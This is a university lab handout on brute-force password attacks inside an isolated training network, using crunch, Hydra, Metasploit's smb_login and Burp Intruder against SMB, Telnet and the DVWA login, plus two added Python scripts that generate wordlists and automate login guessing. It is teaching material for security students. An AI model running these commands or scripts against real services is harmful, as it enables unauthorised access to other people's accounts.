Lab-7: Attacking
There are many different kinds of cyberattacks, such as exploiting a vulnerability with a piece of malicious code, launching a denial-of-service attack, cracking passwords, and social engineering.
In this lab, you will launch brute force password attacks against three different protocols: 1) SMB, 2) HTTP, 3) Telnet. SMB is attacked twice, once with Hydra and once with Metasploit, so the lab has four sections.
Section-1: Brute Force Password Attack against a Remote Windows SMB Service (By using Hydra tool)
In this section, you will crack the password of the Administrator account of the Windows 7 Target computer (192.168.2.13) by using the Hydra tool on Kali Linux. Hydra is an online brute force password cracker: every candidate it tries is a real login attempt against the network service, so the attack only works because nothing on the target locks the account or throttles the connection after thousands of failed logons. You will use another tool named crunch to create the dictionary that Hydra reads.
Assume that you did shoulder surfing and learned that the password of the Administrator account on Windows 7 Target is made up only of the characters “a”, “1”, “2”, “3”, “4”, and “5”. However, you couldn’t find the password with manual tries, so you decided to use a brute force password cracker.
- Log in to Kali Linux on the Netlab environment. Remember that the password of the root account was toor.
- Open a terminal window.
- You want to create a wordlist from the characters you learned by shoulder surfing. Use the crunch tool and type crunch 6 7 aA12345 > my_word_list.txt in the terminal window. You included both the lowercase and uppercase versions of “a” because you are not sure which one is in the password. You also indicated the minimum password length as 6 and the maximum length as 7. With a 7-character set, crunch generates 7^6 + 7^7 = 117649 + 823543 = 941192 candidate passwords that match these conditions, one per line.
- Now open the generated wordlist file by typing vi my_word_list.txt in the terminal window.
- Press the Page Down key to scroll through the list. Press Shift-g (the G command) to go to the end of the file.
- Type :set nu and press Enter. This command shows the line number at the beginning of each line.
- Now search for aA12345, which is the password of the Windows 7 Administrator account. To search for it, type /aA12345 and press Enter.
Note the line number of aA12345, which is 140525. (Crunch writes all 117649 six-character candidates first, then the seven-character candidates in the order the characters were given on the command line; aA12345 is the 22876th seven-character candidate.)
The SMB service does not tolerate parallel connections; therefore, Hydra reduces the number of tasks to 1 for SMB and tries one password at a time. On average, Hydra checks about 5800 passwords per minute, so reaching line 140525 would take roughly 24 minutes. To keep the lab short, you will perform a trick and insert the password as line 6000 of the wordlist.
- In order to do that, press the Esc key, type 6000, and then press Shift-g. The cursor moves to line 6000.
- Press Shift-o (the O command). This opens an empty line above the current line, so the new line becomes line 6000, and puts vi in insert mode. Type aA12345 here. Press Esc. Type :wq and press Enter to save and quit.
- Now it is time to use Hydra to launch a brute force attack against the SMB service on the Windows 7 Target computer. From the directory that contains the wordlist (/root), type hydra -l administrator -P my_word_list.txt smb://192.168.2.13
Take a screenshot of the brute force attack result screen once Hydra has completed processing. (It should take no more than 5 minutes to complete, since the correct password is now within the first 6000 candidates.)
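The numbers in this section (941192 lines, line 140525, about 24 minutes) all follow from how crunch orders its output, and the vi trick is just moving the known password to an early line. The following Python script, added here as an illustration and not part of the lab's tools, reproduces the keyspace of crunch 6 7 aA12345, computes the line number of any candidate by positional arithmetic instead of searching a 941192-line file, and plants a password at a chosen line the way the vi steps do. The 5800 passwords/minute rate is the handout's figure and is used only as a parameter.

```python
import itertools

# Same parameters as the handout's command: crunch 6 7 aA12345
CHARSET = "aA12345"
MIN_LEN, MAX_LEN = 6, 7


def keyspace_size(charset=CHARSET, min_len=MIN_LEN, max_len=MAX_LEN):
    """Number of lines crunch writes: sum of |charset|**n over each length."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def crunch_lines(charset=CHARSET, min_len=MIN_LEN, max_len=MAX_LEN):
    """Yield candidates in crunch's order: shortest length first, then
    lexicographic in the order the characters were given on the command line."""
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def nth_line(n, **kw):
    """Return the 1-based n-th candidate without materialising the whole list."""
    return next(itertools.islice(crunch_lines(**kw), n - 1, None))


def line_of(password, charset=CHARSET, min_len=MIN_LEN, max_len=MAX_LEN):
    """1-based line number of `password` in the wordlist, computed directly:
    skip every shorter length, then read the password as a base-|charset|
    number whose digits are the positions of its characters in the charset."""
    n = len(password)
    if not (min_len <= n <= max_len) or any(c not in charset for c in password):
        raise ValueError("password is outside the keyspace crunch generates")
    shorter = sum(len(charset) ** k for k in range(min_len, n))
    index = 0
    for c in password:
        index = index * len(charset) + charset.index(c)
    return shorter + index + 1


def minutes_to_reach(line_no, rate_per_minute=5800):
    """Expected time for a one-at-a-time attack to reach a given line,
    using the handout's observed Hydra rate for SMB as the default."""
    return line_no / rate_per_minute


def plant_password(lines, password, line_no):
    """The vi trick as a list operation: return a copy of the wordlist with
    `password` inserted so that it becomes line `line_no` (1-based)."""
    out = list(lines)
    out.insert(line_no - 1, password)
    return out


if __name__ == "__main__":
    target = "aA12345"
    print("lines in wordlist:", keyspace_size())          # 941192
    print("line of", target, "is", line_of(target))        # 140525
    print("minutes at 5800/min:", round(minutes_to_reach(line_of(target)), 1))
    # Write the same file crunch would, then plant the password at line 6000.
    with open("my_word_list.txt", "w") as fh:
        planted = plant_password(crunch_lines(), target, 6000)
        fh.write("\n".join(planted) + "\n")
    print("line 6000 is now", planted[5999])
```

Running the script writes a my_word_list.txt with the password already at line 6000; checking line_of() against the number you noted in vi is a quick way to confirm that crunch really does emit the shorter length first and honours the character order you typed.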
Section-2: Brute Force Password Attack against a Remote Windows SMB Service (By using Metasploit Framework)
Metasploit Framework is a must-have tool for every pentester. You will use Metasploit frequently in the ISEC670 labs. Metasploit is included in Kali Linux.
- Open a terminal window on Kali Linux on the Netlab environment.
- Type in msfconsole to open Metasploit Framework
- Type in search smb_login to find the path of the smb_login module.
- Select the smb_login module by typing use auxiliary/scanner/smb/smb_login (this is the path you learned in the previous step).
- Type in show options to see the parameters the module requires.
Note: You can use view>shrink font to decrease the font size in the terminal window.
- Set the target by typing set RHOSTS 192.168.2.13
- Set the username by typing set SMBUSER administrator
- Set the wordlist by typing set PASS_FILE /root/my_word_list.txt
- Discard showing the detailed results by typing set VERBOSE false
- Set the number of parallel process to 8 by typing set THREADS 8
Note: Do not set THREADS higher than 8, as more parallel connections may cause the SMB service on the target to crash.
- Run the brute force attack by typing run. It will take 1-2 minutes for Metasploit Framework to reach the correct password in the wordlist.
Take a screenshot of the Metasploit result showing the username/password pair.
Section-3: Brute Force Password Attack against a Web Login Form
In this section, you will use Burp Suite to perform a brute force attack against a web login form. Burp Suite is the intercepting proxy that application security testers use to observe, modify, and automate web application traffic; here its Intruder tool will replay one captured login request once per password.
- Stay in the Kali Linux on the Netlab environment.
- Click on the Kali icon on the bottom left corner and type Firefox.
- Click on the Firefox ESR icon on the start menu.
- Configure the Proxy Settings of Firefox to have the web traffic directed to the Burp Suite.
Click the Firefox menu and then click Preferences
Scroll down to the bottom of the page and click the Settings button in the Network Settings section.
Select the Manual proxy configuration and type in the IP address as 127.0.0.1 and port number as 8080. (Burp Suite listens on 127.0.0.1:8080 by default). Click OK.
- Open Burp Suite by clicking the Kali Linux icon at the bottom left corner, typing burp, and clicking the burp suite icon on the start menu.
- Click Next while Temporary Project is selected.
- Click Start Burp while Use Burp defaults is selected.
- Switch to Firefox window. Visit the login page hosted at http://192.168.2.15/dvwa/login.php
- Switch to Burp Suite, click on the Proxy tab, and click on the Forward button.
- Switch to Firefox window. You will see the login window below. This is the “Damn Vulnerable Web Application” hosted on the OWASP BWA machine on Netlab.
- At the login page, type admin as the username and type incorrect as the password. Click on the Login button.
- Switch to Burp Suite, verify that the HTTP request is captured and also confirm that the Burp Suite has captured the username and password you typed.
- Right-click anywhere at the bottom section and click on “Send to Intruder”
- Click on Intruder Tab (1), and then click on the Positions Tab (2), and finally click on the Clear button (3).
- Highlight the password value (1) and click on the Add button (2).
- Click on Payloads Tab (1), and then Load button (2).
- Navigate to /usr/share/wordlists/metasploit and click on http_default_pass.txt, and click Open (3)
- Click on the Start Attack button on the top right. Click on OK for the message box about Community edition limitations.
- Burp Suite tries every password in the dictionary file. The brute force attack lasts around 15 seconds because the file contains only a limited number of passwords. Click on the Response tab, as shown in the figure below. Every failed login attempt is answered with a redirect back to login.php; the one successful login is answered with a redirect to index.php, as shown in the figure below. Sorting the results by the Location header (or by response length) makes the single different row easy to spot.
Switch to the Request tab and take a screenshot of the Raw section where you see the username and password pair in the request traffic.
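What Intruder automates here is a loop of form POSTs with one oracle: the Location header of the redirect. The Python script below, added as an illustration and not part of the lab or of Burp, reproduces that loop against a constructed stand-in for DVWA's login.php that runs on a loopback port. The stand-in assumes the real form has the same three fields (username, password, Login) and no CSRF token; if the target issues a per-request token, each attempt would have to fetch the form first. The short wordlist is constructed for the demo and only stands in for http_default_pass.txt.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode


class FakeDvwaLogin(BaseHTTPRequestHandler):
    """Constructed stand-in for DVWA's login.php: a 302 to index.php on a
    correct admin password, a 302 back to login.php on anything else."""
    secret = "password"  # the credential the demo is meant to recover

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        pw = form.get("password", [""])[0]
        ok = user == "admin" and pw == self.secret
        self.send_response(302)
        self.send_header("Location", "index.php" if ok else "login.php")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_fake_dvwa(secret="password"):
    """Start the stand-in on a free loopback port; returns (server, port)."""
    FakeDvwaLogin.secret = secret
    server = HTTPServer(("127.0.0.1", 0), FakeDvwaLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def try_login(host, port, username, password, path="/dvwa/login.php"):
    """One Intruder-style request. Redirects are deliberately not followed,
    so the Location header (the success oracle) stays visible."""
    body = urlencode({"username": username, "password": password, "Login": "Login"})
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("POST", path, body=body,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheader("Location", "")
    finally:
        conn.close()


def brute_force(host, port, username, wordlist):
    """Replay the Intruder run: the first password whose response redirects
    anywhere other than login.php is reported as the hit."""
    for pw in wordlist:
        status, location = try_login(host, port, username, pw)
        if status in (301, 302, 303) and not location.endswith("login.php"):
            return pw, location
    return None, None


# Constructed sample in the spirit of http_default_pass.txt (not its contents)
SAMPLE_WORDLIST = ["admin", "1234", "root", "password", "letmein"]

if __name__ == "__main__":
    server, port = start_fake_dvwa()
    print(brute_force("127.0.0.1", port, "admin", SAMPLE_WORDLIST))  # ('password', 'index.php')
    server.shutdown()
    server.server_close()
```

The important detail is the client: a browser (or any library that follows redirects) would land on login.php or index.php and you would have to diff page bodies; by reading the raw 302 you get the same one-line signal Burp shows in the Location column. Against the real target, replace the loopback host and port with 192.168.2.15 and 80.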
Section-4: Brute Force Password Attack against Telnet Protocol
In this section, you will use the dictionary file from Section-3 to launch a brute force attack against the Telnet service on the Windows 7 Target computer.
- Open a terminal window on Kali Linux on Netlab.
- Go to the directory where the wordlist is stored by typing cd /usr/share/wordlists/metasploit
- Type hydra -l admin -P http_default_pass.txt telnet://192.168.2.13
- Take a screenshot of the terminal window.
Weekly Learning and Reflection
In two to three paragraphs (i.e., sentences, not bullet lists), using APA style citations if needed, summarize and interact with the content covered in this lab. Summarize what you did as an attacker, what kinds of weaknesses you exploited, and what might have prevented these attacks. Mention the attacker and all of the targets in your summary. You can provide topologies, sketches, or graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also about what you learned through the session. You can ask questions about anything you are confused about. Questions asked here will be summarized and answered anonymously in the next class.